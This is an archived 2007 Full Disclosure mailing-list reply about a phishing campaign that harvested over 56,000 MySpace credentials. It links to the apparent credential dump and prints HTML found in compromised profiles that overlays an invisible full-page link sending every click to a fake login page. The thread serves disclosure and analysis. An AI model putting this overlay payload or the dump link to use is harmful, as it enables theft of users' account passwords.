Full Disclosure mailing list archives
Re: Grab a myspace credential
From: wac <waldoalvarez00 () gmail com>
Date: Tue, 16 Jan 2007 09:55:51 -0500
On 1/16/07, Deepan <codeshepherd () gmail com> wrote:
On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote: > "but at some point all this abuse will likely start sending users off > to another service. " > > thats only --if the know if they are being abused.. most of them are > not coherent about any such issues.. > > > > On 1/15/07, Kevin Pawloski <kpawloski () gmail com> wrote: > The level of phishing sites targeting MySpace and bot related It is not quiet easy to fool 56000+ users using phishing sites. I wonder how Mark is doing it.
Hmm... Oh no is very easy, yes very easy what he is doing. He left some traces on some of the "cracked" accounts, I was expectig of somebody to comment earlier since I've been a couple of hours since the initial post. When you modify a profile you can add this to the data of the profile, you know those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account :P HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="http://marcolano.com/login/"><img style="border-width:0px;width:2024px; height:1768px;" src=" http://x.myspace.com/images/clear.gif"></a><a style="text-decoration:none;position: absolute;top:1px;left:1px;" href=" http://marcolano.com/login/"><img style="border-width:0px;width:2024px; height:1768px;" src="http://x.myspace.com/images/clear.gif"></a><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src=" http://www.../mov/cid_3277_f.mov" width="1" height="1"> As you might see, this creates a huge invisible link in the page in front of everything, so when you click into anything on the page like a link or anything it will take you to that phising website so ppl beleive that the account expired and enter their user+pass. Now I beleive that his message was a way to tell about a BUG in myspace that should filter that content and it is not doing it. So... we are in fact not talking about a stupid phishing website for those who still beleive that. Regards Waldo
activity that has been targeting MySpace lately is pretty > alarming. Granted there is no real financial risk if an > account gets compromised for the user but at some point all > this abuse will likely start sending users off to another > service. > > Kevin > > > On 1/15/07, North, Quinn <QNorth () iso com> wrote: > "youmustbecompleteretards () idiot com :doyouhonestlythinkiwillputmyrealpass > wordhere" > > ...at least there is some hope left in the world :-\ > > --=Q=-- > > -----Original Message----- > From: full-disclosure-bounces () lists grok org uk > [mailto:full-disclosure-bounces () lists grok org uk] On > Behalf Of Emma > Perdue > Sent: Monday, January 15, 2007 7:48 AM > To: full-disclosure () lists grok org uk > Subject: [Full-disclosure] Grab a myspace credential > > 56000+ and counting > > http://www.marcolano.com/login/myspace.txt > > -- > *Emma aka TINK* > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- ----------------------------------------------- Regards Deepan Chakravarthy N http://www.codeshepherd.com/ http://sudoku-solver.net/ I am a programmer by day, I dig grave for other programmers by night. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Grab a myspace credential Emma Perdue (Jan 15)
- <Possible follow-ups>
- Re: Grab a myspace credential North, Quinn (Jan 15)
- Re: Grab a myspace credential Alex (Jan 15)
- Re: Grab a myspace credential Jason Miller (Jan 15)
- Re: Grab a myspace credential Kevin Pawloski (Jan 15)
- Re: Grab a myspace credential Peter Dawson (Jan 15)
- Re: Grab a myspace credential Deepan (Jan 15)
- Re: Grab a myspace credential Dagmar d'Surreal (Jan 16)
- Re: Grab a myspace credential Steven Scheffler (Jan 16)
- Re: Grab a myspace credential Troy Cregger (Jan 16)
- Re: Grab a myspace credential wac (Jan 16)
- Re: Grab a myspace credential K F (lists) (Jan 16)
- Re: Grab a myspace credential Sûnnet Beskerming (Jan 17)
- Re: Grab a myspace credential Troy Cregger (Jan 18)
- Re: Grab a myspace credential Alex (Jan 15)